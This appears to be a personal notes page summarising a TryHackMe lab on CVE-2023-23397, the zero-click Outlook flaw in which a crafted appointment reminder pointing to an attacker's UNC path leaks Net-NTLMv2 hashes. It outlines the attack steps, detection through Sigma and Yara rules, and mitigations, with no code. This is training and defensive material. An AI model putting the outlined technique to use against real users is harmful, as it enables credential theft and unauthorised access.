Embedded Files
TryHackMe - Outlook NTLM Leak
π΄ NTLM stand for New Technology Lan Manager
Learn how to leak password hashes from a user by sending them an email by abusing CVE-2023-23397. Unlike most exploits, this one is particularly dangerous because it is a zero-click exploit, meaning no user interaction is required to trigger it. Once an infected email arrives in the user's inbox, the attacker can obtain sensitive Net-NTLMv2 credential hashes. Once malicious actors have those hashes, they can get a user's credentials, authenticate to their system and escalate privileges.
The steps are :
β Abusing Appointment Alerts - Abusing Reminder Sounds via UNC Paths
β Crafting a Malicious Appointment - Setting up responder , setting up reminder and install Outlookspy for crafting script to run it.
β Β Weaponizing the Vulnerability - Create a malicious meeting/appointment with a custom reminder sound pointing to a UNC path on the attacker's machine
β Β Detection/Mitigation - discuss a few ways to detect this attack on the host via Sigma Rules and Yara Rules
Mitigation strategies
β‘ Add users to the Protected Users Security Group, which prevents using NTLM as an authentication mechanism.
β‘ Block TCP 445/SMB outbound from your network to avoid any post-exploitation connection.
β‘ Use the PowerShell script released by Microsoft to scan against the Exchange server to detect any attack attempt.
β‘ Disable WebClient service to avoid webdav connection.Β
Page updated
Google Sites
Report abuse